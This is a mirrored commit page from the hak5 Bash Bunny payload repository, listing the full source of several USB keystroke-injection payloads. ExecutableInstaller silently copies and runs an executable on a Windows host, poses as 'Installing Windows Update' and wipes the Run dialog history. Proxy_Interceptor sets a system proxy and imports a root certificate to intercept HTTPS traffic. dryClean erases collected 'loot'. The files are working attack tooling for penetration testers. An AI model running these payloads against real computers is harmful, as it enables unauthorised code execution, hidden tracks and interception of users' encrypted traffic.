hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Cleanup: Sort payloads by category

Browse Source
This commit is contained in:
Sebastian Kinne
2017-04-10 13:29:17 +10:00
parent 288d90c60e
commit 85b1bc7aca
513 changed files with 2 additions and 361 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
payloads/library/general/DuckyInstall/DuckToolkit-1.0.1.tar.gz Normal file
View File

Binary file not shown.

74
payloads/library/general/DuckyInstall/install.sh Normal file
View File

@@ -0,0 +1,74 @@
#!/usr/bin/env bash
# Based on bashbunnypayloads installer
# https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/tools_installer/install.sh
# Check Switch Position
source bunny_helpers.sh
TARGET_DIR='/root/tools'
RELEASE_ARCHIVE=$(find /root/udisk/payloads/${SWITCH_POSITION} -name DuckToolkit-*)
echo "Install Log:" > /tmp/duck_installer.log
echo "----------------" >> /tmp/duck_installer.log
if [ -f ${RELEASE_ARCHIVE} ]; then
echo "Found ${RELEASE_ARCHIVE}" >> /tmp/duck_installer.log
else
LED R
echo "No ducktoolkit release found" >> /tmp/duck_installer.log
exit 1
fi
# Set LED to purple blinking and move files
LED R B 100
# Backup Existing library
if [ -d "$TARGET_DIR/DuckToolkit" ]; then
echo "Library Exists; removing" >> /tmp/duck_installer.log
rm -rf ${TARGET_DIR}/DuckToolkit
fi
echo "Copying files to target dir" >> /tmp/duck_installer.log
cp ${RELEASE_ARCHIVE} ${TARGET_DIR}
cd ${TARGET_DIR}
tar zxf DuckToolkit-* && mv $(find . -name "DuckToolkit-*" ! -name "*.gz") DuckToolkit && rm DuckToolkit*.tar.gz
echo "Move Complete" >> /tmp/duck_installer.log
# Set LED to purple solid and check that move completed
LED R B
if ! [ -d "${TARGET_DIR}/DuckToolkit" ]; then
# Set LED to red on fail and exit
LED R
echo "Failed to copy files to target dir" >> /tmp/duck_installer.log
exit 1
else
# Set LED to amber blinking on setup
LED G R 100
# Set calling script executable
chmod +x ${TARGET_DIR}/DuckToolkit/bunnyducky.py
# Update Q and QUACK to use the new library
echo "Update Q" >> /tmp/duck_installer.log
cat <<'EOF' > /root/Q
#!/bin/sh
# Input parameters;
strparam="$@"
/root/tools/DuckToolkit/bunnyducky.py -l $DUCKY_LANG "$strparam" >> /root/ducklog.txt
exit 0
EOF
echo "Update QUACK" >> /tmp/duck_installer.log
cat <<'EOF' > /root/QUACK
#!/bin/sh
# Input parameters;
strparam="$@"
/root/tools/DuckToolkit/bunnyducky.py -l $DUCKY_LANG "$strparam" >> /root/ducklog.txt
exit 0
EOF
# LED To green for complete
LED R G B
fi
cp /tmp/duck_installer.log /root/udisk/payloads/${SWITCH_POSITION}/install_log.txt

3
payloads/library/general/DuckyInstall/payload.txt Normal file
View File

@@ -0,0 +1,3 @@
# Install payload for the DuckToolkit
# See install.sh and readme.txt for details
ATTACKMODE ECM_ETHERNET STORAGE

14
payloads/library/general/DuckyInstall/readme.txt Normal file
View File

@@ -0,0 +1,14 @@
DuckToolkit installer for Bash Bunny.
Adds support for new languages. and uses the Ducktoolkit python library for encoding.
Version 1.0.0
Moves the libary files to /tools
Update Q and QUACK to point to the new library
Writes error to /root/ducky.log
Purple Blinking.................Moving tools
Purple Solid....................Tools moved
Amber Blinking..................Setup tools
Red Solid.......................Tool installation failed
White Solid.....................Installation completed successfully

9
payloads/library/general/DuckyTemplate/ducky_script.txt Normal file
View File

@@ -0,0 +1,9 @@
DELAY 2000
GUI r
DELAY 1000
STRING notepad.exe
DELAY 100
ENTER
DELAY 3000
STRING https://bunnytoolkit.com running Ducky Script on a Bash Bunny
Enter

18
payloads/library/general/DuckyTemplate/payload.txt Normal file
View File

@@ -0,0 +1,18 @@
LED G
ATTACKMODE HID STORAGE
# Set your language here
LANGUAGE='us'
LED R G
# Check for switch position to make it easier for us.
source bunny_helpers.sh
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
QUACK ${SWITCH_POSITION}/ducky_script.txt
LED G
else
LED R
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1
fi

25
payloads/library/general/DuckyTemplate/readme.md Normal file
View File

@@ -0,0 +1,25 @@
# Ducky Script Template for Bash Bunnys
Author: @kevthehermit
Version: Version 1.0
## Description
Boiler Plate for running ducky scripts on the Bash Bunny
## Configuration
HID or HID STORAGE
## Requirements
Install DuckToolkit payload for extra language support
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| Red | Failed to open script file |
| Amber | Script Running |
| Green | Finished |

4
payloads/library/general/ExecutableInstaller/d.cmd Normal file
View File

@@ -0,0 +1,4 @@
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~dp0\i.vbs %~dp0\e.cmd
@exit

23
payloads/library/general/ExecutableInstaller/e.cmd Normal file
View File

@@ -0,0 +1,23 @@
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Below is for copying a directory with a payload inside the root directory of the Bash Bunny USB Mass Storage.
REM echo d | xcopy /C /Q /Y /E %~dp0\..\..\PAYLOAD_FOLDER_IN_ROOT %APPDATA%\PAYLOAD_FOLDER_IN_ROOT
REM Copy payload.exe from the root of the bash Bash Bunny USB Mass Storage (change to whatever you like).
copy %~dp0\..\..\payload.exe %APPDATA%\payload.exe
REM Below is for executing a payload inside a directory (see comments above). Change --startup to whatever parameters you wish to pass (or remove it).
REM start "" "%APPDATA%\PAYLOAD_FOLDER_IN_ROOT\payload.exe" --startup
REM Launch payload.exe with the startup parameter. Change --startup to whatever parameters you wish to pass (or remove it).
start "" "%APPDATA%\payload.exe" --startup
REM Blink CAPSLOCK key (from usb_exfiltrator)
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit

1
payloads/library/general/ExecutableInstaller/i.vbs Normal file
View File

@@ -0,0 +1 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

25
payloads/library/general/ExecutableInstaller/payload.txt Normal file
View File

@@ -0,0 +1,25 @@
#!/bin/bash
#
# Title: ExecutableInstaller
# Author: IMcPwn
# Version: 1.0
# Target: Windows 7+
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# using the --startup parameter. Change these settings inside of e.cmd.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
# Green LED for finished
LED G

27
payloads/library/general/ExecutableInstaller/readme.md Normal file
View File

@@ -0,0 +1,27 @@
# ExecutableInstaller for Bash Bunnys
* Author: IMcPwn
* Version: Version 1.0
* Target: Windows
## Description
Copies an executable (or executable in a directory) from the Bash Bunny USB Mass Storage
to %APPDATA% and then executes it with the --startup parameter (or whatever parameter you want).
## Configuration
By default the staged payload copies the payload payload.exe from the root of the Bash Bunny, rename this to whatever you like inside
by editing e.cmd.
The payload copies to %APPDATA%, change this to wherever you like by editing e.cmd.
You may also copy a payload inside a directory, see comments in e.cmd.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Red | Attack Setup |
| Green | Attack Complete |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread")

33
payloads/library/general/GitBunnyGit/README.md Executable file
View File

@@ -0,0 +1,33 @@
# Git-Bunny-Git
Author: Draxiom & audibleblink & Nicholas Adamou
Version: 1.0
## Description
Clones the bashbunny-payloads repository and also will update an existing repository. Use this payload to get all the other payloads!
## Configuration
Configured for nix by default. Swap RNDIS_ETHERNET with ECM_ETHERNET on Windows
## Requirements
Target must be sharing internet. BashBunny must have git installed.
1. Run bb.sh (pause at main menu)
2. Plug in da bunny
3. Connect (type 'c') 5 seconds after the white light
4. You can now ssh into the bunny (Run `tail -f /tmp/git` to montior progress)
## Status
| LED | Status |
| ---------------- | ------------------------------------- |
| White | Ready (to share internet connection) |
| Red | Failed (no internet) |
| Red (blinking) | Failed (could not mount filesystem) |
| Amber | Running |
| Purple | Cleaning Up |
| Green (blinking) | Finished (git pull) |
| Green | Finished (git clone) |

84
payloads/library/general/GitBunnyGit/payload.txt Executable file
View File

@@ -0,0 +1,84 @@
#!/bin/bash
# Title: Git Bunny Git
# Author: Draxiom && audibleblink && Nicholas Adamou
# Target: any
# Version: 1.1
#
# Update payloads from Github
#
# White | Ready (to run bb.sh on the host computer)
# Red | No Internet
# Red (blinking) | Could not mount filesystem
# Amber | Running
# Green (blinking) | Git Pull Finished
# Green | Git Clone Finished
LED W
#ATTACKMODE RNDIS_ETHERNET
ATTACKMODE ECM_ETHERNET
# Set your desired repo url and branch if you're not looking to update from mainline
git_repo="https://github.com/hak5/bashbunny-payloads.git"
git_branch="master"
payloads_dir="/root/udisk"
log_file="/var/log/git.log"
if [ -f "$log_file" ]; then
rm -rf "$log_file"
fi
echo " --------- Git Bunny Git [started] -----------" >> $log_file
# Sanity check on mounted drive
[[ ! `mount | grep "nandf"` ]] && { LED R DOUBLE; echo "Could not mount filesystem" >> $log_file; exit 1; }
# Test for internet connection
wget -q --tries=15 --timeout=5 --spider http://example.com
[[ "$?" -ne 0 ]] && { LED R; echo "Could not connect to the internet" >> $log_file; exit 1; }
# Let's go
LED Y
cd $payloads_dir
# Cannot verify ca certificate... skip it
export GIT_SSL_NO_VERIFY=1
if [ -d ".git" ]; then
# Get the newest payloads
git pull origin $git_branch &>> $log_file
echo "Git repository updated." >> $log_file
LED G SLOW
else
# Move the existing payloads directory, in case hackers be hackin'
mv payloads payloads-orig
echo "Existing 'payloads' directory preserved as 'payloads-orig'" >> $log_file
# Initialize Repository
git init &>> $log_file
# Let's pick the hak5 github repo
git remote add origin $git_repo &>> $log_file
echo "Git repository selected: $git_repo" >> $log_file
# Instead of cloning the whole repo,
git config core.sparsecheckout true
echo "Git configuration change: sparse-checkout=true." >> $log_file
# isolate the payloads directory
echo "payloads" >> .git/info/sparse-checkout
echo "Sparse checkout: 'payloads' directory selected" >> $log_file
# "git clone"
git pull origin $git_branch &>> $log_file
echo "Git repository cloned." >> $log_file
# Ignore any existing directories or files, so git status is pretty, and git pull will work after the "clone"
LED M
for file in $(ls -A); do
[[ "${file}" =~ [^payloads$] ]] && { echo "${file}" >> .gitignore; echo ".gitignore add: ${file}" >> $log_file; }
done
echo "payloads/switch*" >> .gitignore
echo ".gitignore add: payloads/switch*" >> $log_file;
# Put the existing switch directories back
cp -r payloads-orig/switch* payloads/.
# Git 'er done
LED G
fi
echo " --------- Git Bunny Git [finished] ----------" >> $log_file

30
payloads/library/general/InfiniteControl/payload.txt Normal file
View File

@@ -0,0 +1,30 @@
#!/bin/bash
# Title: Infinite Control
# Author: Didier Stevens (https://DidierStevens.com)
# Version: 0.0.1 2017/04/08
#
# Hit the CONTROL key every 10 seconds in an infinite loop,
# while blinking the red LED with every keypress.
#
# Can be used to prevent a machine from sleeping or auto-locking.
#
# WARNING: Do not type on the machine's keyboard while this script
# is running, or your keystrokes might become commands,
# for example CTRL-Q: Quit
#
# Red ...............Hitting CONTROL key
# Red Blinking.......Wow! We broke out of the infinite while loop!
ATTACKMODE HID
# infinite while loop
while true
do
LED R
QUACK CTRL
LED
sleep 10
done
# this code will never be reached
LED R 100

17
payloads/library/general/InfiniteControl/readme.md Normal file
View File

@@ -0,0 +1,17 @@
# Infinite Control For Bash Bunny
Author: Didier Stevens
Version: Version 0.0.1
## Description
Hit the CONTROL key every 10 seconds in an infinite loop, while blinking the red LED with every keypress.
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| Red flash | CONTROL keypress |

6
payloads/library/general/Proxy_Interceptor/ImportCert.ps1 Normal file
View File

@@ -0,0 +1,6 @@
#Import variables from vars.ps1 for use.
. .\vars.ps1
#Add certificate to certificate store
$certFile = ( Get-ChildItem -Path $certName )
$certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root

30
payloads/library/general/Proxy_Interceptor/README.md Normal file
View File

@@ -0,0 +1,30 @@
# Proxy Interceptor for Bash Bunny
Author: NightStalker
Version: 1.0
## Description
This payload will enable a proxy and import an SSL certificate to a Windows
computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
The script uses a combination of Ducky Code and PowerShell.
*Note: Currently no falure LED, if remains red for more than 60 seconds
script failed. Will build checks in later version.
## Requirements
Certificate needs to be in .pem format and in the root switch directory with
payload.txt, set the certificate and proxy information in the vars.ps1 file.
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| White (blinking) | Script Running. |
| Purple (blinging)| Script Complete. |
## Discussion
https://forums.hak5.org/index.php?/topic/40476-payload-proxy-interceptor/

19
payloads/library/general/Proxy_Interceptor/SetProxy.ps1 Normal file
View File

@@ -0,0 +1,19 @@
#Import variables from vars.ps1 for use.
. .\vars.ps1
#Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it.
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
$ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue
if ($ieProcess) {
$ieProcess.CloseMainWindow()
Sleep 5
if (!$ieProcess.HasExited) {
$ieProcess | Stop-Process -Force
}
}
Remove-Variable ieProcess
#Change the proxy settings in the registry
$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Set-ItemProperty -path $regKey ProxyEnable -value 1
Set-ItemProperty -path $regKey ProxyServer -value $proxyVal

4
payloads/library/general/Proxy_Interceptor/cert.pem Normal file
View File

@@ -0,0 +1,4 @@
-----BEGIN CERTIFICATE-----
REPLACE WITH CORRECT VALID PEM FORMAT CERTIFICATE
FROM PROXY FOR SSL INTERCEPTION.
-----END CERTIFICATE-----

65
payloads/library/general/Proxy_Interceptor/payload.txt Normal file
View File

@@ -0,0 +1,65 @@
#!/bin/bash
#
# Title: Proxy Interceptor
# Author: NightStalker
# Version: 1.0
#
#This payload will enable a proxy and import an SSL certificate to a Windows
#computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
#The script uses a combination of Ducky Code and PowerShell.
#
# Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt
#
# Red Blinking.............Running Payload
# Purple Blinking .........Payload Completed
#Set Red LED to indicate Starting of Script
LED R 50
#Set ATTACKMODE to HID and Storage to be able to transfer the certificate
ATTACKMODE HID STORAGE
#Import Bunny Helpers
source bunny_helpers.sh
#Start of Script
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 100
#Change to the directory of the Bunny with the proper switch location
Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name
Q ENTER
Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\'
Q ENTER
Q STRING cd \$absPath
Q ENTER
Q DELAY 500
#Set the proxy in the internet settings in the registry (For IE and Chrome).
Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
Q ENTER
Q DELAY 500
#Import the certificate to the computer (for IE and Chrome).
Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ImportCert.ps1')"
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 500
#Unmount the USB Drive.
Q STRING \$driveEject = New-Object -comObject Shell.Application
Q ENTER
Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 500
Q ALT t
Q DELAY 500
Q STRING EXIT
Q ENTER
sync
LED R B 100

3
payloads/library/general/Proxy_Interceptor/vars.ps1 Normal file
View File

@@ -0,0 +1,3 @@
#Set variables for use in payload.
$proxyVal = "proxyip:port"
$certName = "cert.pem"

20
payloads/library/general/dryClean/README.md Normal file
View File

@@ -0,0 +1,20 @@
# dryClean
* Author: ricky5ive
* Version: Version 1.0
* Target: N/A
* Category: CYA
* Attackmodes: N/A
## Description
Removes loot directory along with contents. Will remove ANY loot directory located on the BashBunny
## STATUS
| LED | Status |
| ------------------- | -------------------------------------- |
| White (fast blink) | Running |
| Red (fast blink) | Failed to remove loot directory |
| Green | Finished |
| | |

35
payloads/library/general/dryClean/payload.txt Normal file
View File

@@ -0,0 +1,35 @@
#!/bin/bash
#
# Title: dryClean for Bash Bunny
# Author: ricky5ive
# Version: 1.0
#
# deletes files in the */loot folder/s
#
# White Blinking ........... Running
# Red ...................... Failed to wipe files
# Green .................... Done
#
#
LED R G B 100
# Create directory to mount the mass storage partition to
if [ ! -d /mnt/hotbuns]; then
mkdir /mnt/hotbuns
fi
# Mount mass storage partition
mount /dev/nandf /mnt/hotbuns
# Find all loot folders
# Delete all the loot folders and their contents
for i in `find / -name loot`; do
rm -rf $i
done
# Check to make sure loot folders are gone *blink RED == failed to remove*
if [ "`find / -name loot | wc -l`" -gt "0" ] ; then
LED R 100
else
LED G
fi